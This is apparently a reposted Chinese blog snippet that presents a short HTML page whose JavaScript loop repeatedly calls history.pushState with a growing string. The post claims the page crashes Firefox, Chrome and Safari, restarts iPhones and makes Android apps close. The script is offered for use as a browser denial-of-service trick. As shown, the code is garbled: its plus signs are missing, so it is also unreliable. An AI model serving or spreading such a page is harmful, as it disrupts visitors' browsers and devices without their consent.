标签:
<html> <body> <script> var total=""; for (var i=0;i<1000000;i ) { total= total i.toString(); history.pushState(0,0,total); } </script> </body> </html>
如果你使用上述这段12行的JavaScript代码,就可以能让firefox、chrome、safari浏览器崩溃,而且还能让iphone重启,安卓手机闪退!
标签:
原文地址:http://www.cnblogs.com/q460021417/p/5156546.html